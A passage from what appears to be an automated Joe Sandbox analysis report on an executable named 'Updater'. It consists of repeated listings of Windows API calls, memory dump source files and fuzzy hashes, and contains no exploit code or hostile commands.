                                                                                                  • Opcode Fuzzy Hash: a68b0b7ff08e6b2fb2e3cf4331e598c11fab3e18392c9dd70b14f741d5d9ce8e
                                                                                                  • Instruction Fuzzy Hash: FA31F6709043828FFB31CB78D868BB637E8AB17304F108159E566C24A3E77C9985CB95
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNEL32(74DF3340,0076D934,74DF3340), ref: 0073E0D2
                                                                                                  • GetLastError.KERNEL32 ref: 0073E0E1
                                                                                                  • CreateDirectoryW.KERNEL32(74DF3340,00000000), ref: 0073E0F0
                                                                                                  • CreateDirectoryW.KERNEL32(74DF3340,00000000,00000000,000000FF,0076D934), ref: 0073E14D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2267087916-0
                                                                                                  • Opcode ID: f078cbd783844e110b78f78436cdbc24870d10e59d41ed2d93e3bad7369b404b
                                                                                                  • Instruction ID: e82f4d15e1ac015673fa0b59c8dfd752c8b0be17a471e133b3c654af29cc9052
                                                                                                  • Opcode Fuzzy Hash: f078cbd783844e110b78f78436cdbc24870d10e59d41ed2d93e3bad7369b404b
                                                                                                  • Instruction Fuzzy Hash: D1219170A083059F9710DF28C8808AB77E8FE59364F104A1DF8AA873E2DB34DD46CB56
                                                                                                  APIs
                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00763128
                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00763142
                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00763150
                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 0076315E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                  • String ID:
                                                                                                  • API String ID: 2169480361-0
                                                                                                  • Opcode ID: 53e197946d6850cb255dd4fb69acac8b40eba040b758b3a77c8cddcd7580c25b
                                                                                                  • Instruction ID: c2cef15ddf969f90381eea9206566a66ebf2ce862507879dadbf53b14dcd46f3
                                                                                                  • Opcode Fuzzy Hash: 53e197946d6850cb255dd4fb69acac8b40eba040b758b3a77c8cddcd7580c25b
                                                                                                  • Instruction Fuzzy Hash: 59212130608615AFD7149B14CC44FAA7B99AF86324F188119F8278B392CB79EE42CB84
                                                                                                  APIs
                                                                                                    • Part of subcall function 00739C5A: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,007387CE,?,000000FF,?,00739624,00000000,?,0000001C,?,?), ref: 00739C69
                                                                                                    • Part of subcall function 00739C5A: lstrcpyW.KERNEL32(00000000,?,?,007387CE,?,000000FF,?,00739624,00000000,?,0000001C,?,?,00000000), ref: 00739C8F
                                                                                                    • Part of subcall function 00739C5A: lstrcmpiW.KERNEL32(00000000,?,007387CE,?,000000FF,?,00739624,00000000,?,0000001C,?,?), ref: 00739CC0
                                                                                                  • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00739624,00000000,?,0000001C,?,?,00000000), ref: 007387E7
                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00739624,00000000,?,0000001C,?,?,00000000), ref: 0073880D
                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00739624,00000000,?,0000001C,?,?,00000000), ref: 00738848
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                  • String ID: cdecl
                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                  • Opcode ID: 48ee46041acea98dc9def045adac475f7f334bfc8e75bb6327986af2fd5b14cb
                                                                                                  • Instruction ID: 3469486df0346f1e82a70e0f4c4f8076b5039fdb0a7044586a4cc86d0f5c6a53
                                                                                                  • Opcode Fuzzy Hash: 48ee46041acea98dc9def045adac475f7f334bfc8e75bb6327986af2fd5b14cb
                                                                                                  • Instruction Fuzzy Hash: 3711037A210305EBEB145F39C8449BA77E9FF89750F90802AFA06C7251EF799801C3A1
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00732B63
                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00732B75
                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00732B8B
                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00732BA6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 3850602802-0
                                                                                                  • Opcode ID: 9229d08ca7dee4539cd8920f8a7120ba1b5fbda8fe7ea36631e4ac27af6248fc
                                                                                                  • Instruction ID: b5af84b31cece361a11d7c02555b1ab328f6e888e02f9ee1c7d6dede1c7b166e
                                                                                                  • Opcode Fuzzy Hash: 9229d08ca7dee4539cd8920f8a7120ba1b5fbda8fe7ea36631e4ac27af6248fc
                                                                                                  • Instruction Fuzzy Hash: D711237A900228FFEB109FA4CC85FADFB78FB08750F200191EA00B7291DA716E11DB94
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0073F03F
                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 0073F072
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0073F088
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0073F08F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 2880819207-0
                                                                                                  • Opcode ID: cf29aae51143de756f75e83df22df149336a84321c7044ec2892feee95b28256
                                                                                                  • Instruction ID: 24c5ae8b682dacaf0197ecc29b30f7a6d3c03e6702bc1526e04682bf9a8cc140
                                                                                                  • Opcode Fuzzy Hash: cf29aae51143de756f75e83df22df149336a84321c7044ec2892feee95b28256
                                                                                                  • Instruction Fuzzy Hash: 90110C76E00258BFDB149FAC9C089AB7FADEB46350F048265F815D3292D6BD8D0187A5
                                                                                                  APIs
                                                                                                  • RtlInitializeCriticalSection.NTDLL(014BBB35), ref: 0149E074
                                                                                                  • RtlEnterCriticalSection.NTDLL(014BBB35), ref: 0149E087
                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0149E125), ref: 0149E0B1
                                                                                                  • RtlLeaveCriticalSection.NTDLL(014BBB35), ref: 0149E11F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                  • String ID:
                                                                                                  • API String ID: 730355536-0
                                                                                                  • Opcode ID: db28ae592cbb4d2fabd3dd9cff963986afdfac9e6cf9b40811c5e1de92dd3de3
                                                                                                  • Instruction ID: 413aa8a26a641aaabcf8eecd5c76397b5ff0b7bf54c20ae05bb7da2d6b1b30da
                                                                                                  • Opcode Fuzzy Hash: db28ae592cbb4d2fabd3dd9cff963986afdfac9e6cf9b40811c5e1de92dd3de3
                                                                                                  • Instruction Fuzzy Hash: 641190B0A08244EBDB35EF9AD895A997FA4E769300F10846FA1549BBB9C6745800D721
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,?,006FCE98,00000000,00000004,00000000), ref: 006FD0B7
                                                                                                  • GetLastError.KERNEL32 ref: 006FD0C3
                                                                                                  • __dosmaperr.LIBCMT ref: 006FD0CA
                                                                                                  • ResumeThread.KERNEL32(00000000), ref: 006FD0E8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                  • String ID:
                                                                                                  • API String ID: 173952441-0
                                                                                                  • Opcode ID: 14a605520f9bfbadf051d3b948ca2732e804e445f8c72d8850469a280fa477f1
                                                                                                  • Instruction ID: 115fd9c74f246ea1524812726e53b68d1566a446cb137f0fe6dd5518ef403626
                                                                                                  • Opcode Fuzzy Hash: 14a605520f9bfbadf051d3b948ca2732e804e445f8c72d8850469a280fa477f1
                                                                                                  • Instruction Fuzzy Hash: 8401F93251020CBBCB206FA5DC09BBB7B6BDF41331F204319FA14862E0DFB59802C6A4
                                                                                                  APIs
                                                                                                  • RtlInitializeCriticalSection.NTDLL(014BBB35), ref: 0149E074
                                                                                                  • RtlEnterCriticalSection.NTDLL(014BBB35), ref: 0149E087
                                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,0149E125), ref: 0149E0B1
                                                                                                  • RtlLeaveCriticalSection.NTDLL(014BBB35), ref: 0149E11F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                  • String ID:
                                                                                                  • API String ID: 730355536-0
                                                                                                  • Opcode ID: 67fb67451a323f0ff647a9f79a6de8dd443e3e9b64c2c7fcfb99847a9cbb6beb
                                                                                                  • Instruction ID: 3cfb7784b846432ab2fb821873fda607e93391c1fd2d9f1fadab74833f65b126
                                                                                                  • Opcode Fuzzy Hash: 67fb67451a323f0ff647a9f79a6de8dd443e3e9b64c2c7fcfb99847a9cbb6beb
                                                                                                  • Instruction Fuzzy Hash: B011B2B0E0C244EBDB35EFDAD895B997FA4E769300F10846F91549BBB9C6745800D721
                                                                                                  APIs
                                                                                                    • Part of subcall function 0073EC33: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0073DCD6,?), ref: 0073EC50
                                                                                                  • GetFileAttributesW.KERNEL32(?,00000000,?,0073F417,?,?,?), ref: 0073F6F4
                                                                                                  • RemoveDirectoryW.KERNEL32(?,?,0073F417,?,?,?), ref: 0073F70E
                                                                                                  • _wcslen.LIBCMT ref: 0073F71B
                                                                                                  • SHFileOperationW.SHELL32(?,?,0073F417,?,?,?), ref: 0073F759
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesDirectoryFullNameOperationPathRemove_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3674178553-0
                                                                                                  • Opcode ID: e2ca54b41436e1cba02f8d8cb3ebc30d8df5273dd761588ea820a120ebcf3b3e
                                                                                                  • Instruction ID: 31d9321e0d4a569e4ef32ba5c14e6f8b83fdc8de4c0c91b4f7bfc2cdfb38a6b8
                                                                                                  • Opcode Fuzzy Hash: e2ca54b41436e1cba02f8d8cb3ebc30d8df5273dd761588ea820a120ebcf3b3e
                                                                                                  • Instruction Fuzzy Hash: 47119E70E0020D8BDF11DFB8D909AEDB7B9BF08340F5405BAE419D3282EB7896848B50
                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006E45AE
                                                                                                  • GetStockObject.GDI32(00000011), ref: 006E45C2
                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 006E45CC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3970641297-0
                                                                                                  • Opcode ID: 2372cc4636c199ec086123325c1ed6a2aedfa196e3fb0db90963f695970ab15e
                                                                                                  • Instruction ID: ebb3fc09bd1dfcdf3fdc5594a4837a5dedac8034472ef3624dd29e911e12f807
                                                                                                  • Opcode Fuzzy Hash: 2372cc4636c199ec086123325c1ed6a2aedfa196e3fb0db90963f695970ab15e
                                                                                                  • Instruction Fuzzy Hash: 6A11AD72602698BFDF124FA1DC44EEA7B6EEF08394F154115FA0592120DB75DC60EBA0
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00738339
                                                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00738351
                                                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00738366
                                                                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00738384
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                  • String ID:
                                                                                                  • API String ID: 1352324309-0
                                                                                                  • Opcode ID: d86241fc9821fcc6db1046f65dbc8d7d0d064b4188e57d83578b2f0f2135c7fd
                                                                                                  • Instruction ID: 6384b2eeb04dab9d200c6b5a645670ba7e5168c4376a18e36c183b80805c5a91
                                                                                                  • Opcode Fuzzy Hash: d86241fc9821fcc6db1046f65dbc8d7d0d064b4188e57d83578b2f0f2135c7fd
                                                                                                  • Instruction Fuzzy Hash: D7118EB16123049FF7208F50DC08F9A7BF8EB00B00F108569FA16D6251EBB8E904AB52
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00702EF1,?,00000000,00000000,00000000,?,00703162,00000006,FlsSetValue), ref: 00702F7C
                                                                                                  • GetLastError.KERNEL32(?,00702EF1,?,00000000,00000000,00000000,?,00703162,00000006,FlsSetValue,0077311C,00773124,00000000,00000364,?,00702D1D), ref: 00702F88
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00702EF1,?,00000000,00000000,00000000,?,00703162,00000006,FlsSetValue,0077311C,00773124,00000000), ref: 00702F96
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3177248105-0
                                                                                                  • Opcode ID: c619f0ec4375d7af5d7c356b58c7b4f067406bac2a21126d74aa749e4ddec188
                                                                                                  • Instruction ID: a764126bb7de9bbe763a6121e09d49c7f79d1d1bc5ee23cc2b4387293e6ee878
                                                                                                  • Opcode Fuzzy Hash: c619f0ec4375d7af5d7c356b58c7b4f067406bac2a21126d74aa749e4ddec188
                                                                                                  • Instruction Fuzzy Hash: 5A012433715323DBC7314A399C08A5677E8AF05BE0B214720F906D71C2C629EC0286E4
                                                                                                  APIs
                                                                                                  • GetWindowRect.USER32(?,?), ref: 007687ED
                                                                                                  • ScreenToClient.USER32(?,?), ref: 00768805
                                                                                                  • ScreenToClient.USER32(?,?), ref: 00768829
                                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00768844
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 357397906-0
                                                                                                  • Opcode ID: c8ab9e8974c53394eed116f1f3f23c82bc64980a1fe4b853e1e4434b24415073
                                                                                                  • Instruction ID: ed9316ded948ee25cb36b39729d69c0865e6450e0ecd6149db943128b5868901
                                                                                                  • Opcode Fuzzy Hash: c8ab9e8974c53394eed116f1f3f23c82bc64980a1fe4b853e1e4434b24415073
                                                                                                  • Instruction Fuzzy Hash: CB1143B9D0020AEFDB51CF99C8849EEBBF9FB18310F108166E915E3210D775AA548F55
                                                                                                  APIs
                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 014A3F7A
                                                                                                  • GetLastError.KERNEL32(?,?), ref: 014A3F83
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 014A3F99
                                                                                                  • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 014A3FA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileTime$DateErrorFindLastLocalNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 2103556486-0
                                                                                                  • Opcode ID: f218713af8d7f5f400ed25a2b579a45ca9935611dad86f3b5450e84def11e28b
                                                                                                  • Instruction ID: 34958824514c5199d4c0485f400c739042345eb1d986ae9af7ea1848e643cd42
                                                                                                  • Opcode Fuzzy Hash: f218713af8d7f5f400ed25a2b579a45ca9935611dad86f3b5450e84def11e28b
                                                                                                  • Instruction Fuzzy Hash: 3A0162766001019F8B04DFA9C8C1D8773ACAB3825034145A7FD45CF25AF770D95087B0
                                                                                                  APIs
                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00734DD0
                                                                                                  • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00734DE4
                                                                                                  • GetParent.USER32 ref: 00734DF9
                                                                                                  • InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?,?,00000000,00000000,00000000,00000002,00001388,?), ref: 00734E00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$InvalidateParentRectTimeout
                                                                                                  • String ID:
                                                                                                  • API String ID: 3648793173-0
                                                                                                  • Opcode ID: 34b68b5bdb57c0ac2713c1bdc7118134d4355ed4d632c22ac53828d59723f480
                                                                                                  • Instruction ID: 308666b5afe2d763cf596f4497b823ce3cc602e8423bc22fcf96503ee99382a6
                                                                                                  • Opcode Fuzzy Hash: 34b68b5bdb57c0ac2713c1bdc7118134d4355ed4d632c22ac53828d59723f480
                                                                                                  • Instruction Fuzzy Hash: 35F06D35640344FBFB345F67DC0DF977FACEB96B80F008159F946860A1CAAA9C04DAA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E3B38: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E3B92
                                                                                                    • Part of subcall function 006E3B38: SelectObject.GDI32(?,00000000), ref: 006E3BA1
                                                                                                    • Part of subcall function 006E3B38: BeginPath.GDI32(?), ref: 006E3BB8
                                                                                                    • Part of subcall function 006E3B38: SelectObject.GDI32(?,00000000), ref: 006E3BE1
                                                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00769270
                                                                                                  • LineTo.GDI32(?,?,?), ref: 0076927D
                                                                                                  • EndPath.GDI32(?), ref: 0076928D
                                                                                                  • StrokePath.GDI32(?), ref: 0076929B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
